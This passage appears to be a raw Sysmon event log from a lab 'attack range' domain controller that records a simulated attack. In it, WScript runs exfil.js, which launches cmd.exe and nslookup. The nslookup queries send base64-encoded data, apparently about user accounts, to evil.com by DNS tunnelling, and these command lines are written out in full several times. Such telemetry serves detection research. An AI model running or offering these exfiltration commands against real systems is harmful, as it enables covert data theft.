ll.dll+51791 10341000x8000000000000000213569Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.298{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213568Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.298{2E1864BB-18E0-629A-6742-000000005F02}39762260C:\Windows\System32\WScript.exe{2E1864BB-18F9-629A-8845-000000005F02}2608C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213567Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.307{2E1864BB-18F9-629A-8845-000000005F02}2608C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfVXNlckFjY291bnQqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgjloc.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000213566Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.298{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlklpk.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000213565Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.277{2E1864BB-18F9-629A-8645-000000005F02}79723316C:\Windows\system32\conhost.exe{2E1864BB-18F9-629A-8745-000000005F02}1220C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213564Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.261{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213563Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.261{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213562Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.261{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213561Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.261{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213560Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.261{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F9-629A-8745-000000005F02}1220C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213559Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.261{2E1864BB-18F9-629A-8545-000000005F02}76281648C:\Windows\system32\cmd.exe{2E1864BB-18F9-629A-8745-000000005F02}1220C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213558Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.274{2E1864BB-18F9-629A-8745-000000005F02}1220C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F9-629A-8545-000000005F02}7628C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlklpk.tmp 2>&1 10341000x8000000000000000213557Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.245{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18F9-629A-8645-000000005F02}7972C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213556Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.245{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F9-629A-8645-000000005F02}7972C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213555Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.230{2E1864BB-18F9-629A-8645-000000005F02}79723316C:\Windows\system32\conhost.exe{2E1864BB-18F9-629A-8545-000000005F02}7628C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213554Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.230{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F9-629A-8645-000000005F02}7972C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213553Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.214{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F9-629A-8545-000000005F02}7628C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213552Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.214{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213551Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.214{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213550Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.214{2E1864BB-18E0-629A-6742-000000005F02}39766140C:\Windows\System32\WScript.exe{2E1864BB-18F9-629A-8545-000000005F02}7628C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213549Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.214{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213548Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.214{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213547Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.217{2E1864BB-18F9-629A-8545-000000005F02}7628C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlklpk.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000213546Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.198{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlmle.tmpMD5=D9DF221F6D351CB50A3CBB01BFD8B97F,SHA256=8D9029C9E209585AD6E7701BC4A411971A01D3D7E0C67FCA5DA104D2C7FD6185,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000213545Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.176{2E1864BB-18F9-629A-8345-000000005F02}27927856C:\Windows\system32\conhost.exe{2E1864BB-18F9-629A-8445-000000005F02}2088C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213544Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.161{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213543Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.161{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213542Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.161{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213541Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.161{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213540Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.161{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18F9-629A-8445-000000005F02}2088C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213539Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.161{2E1864BB-18F9-629A-8245-000000005F02}77921660C:\Windows\system32\cmd.exe{2E1864BB-18F9-629A-8445-000000005F02}2088C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213538Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 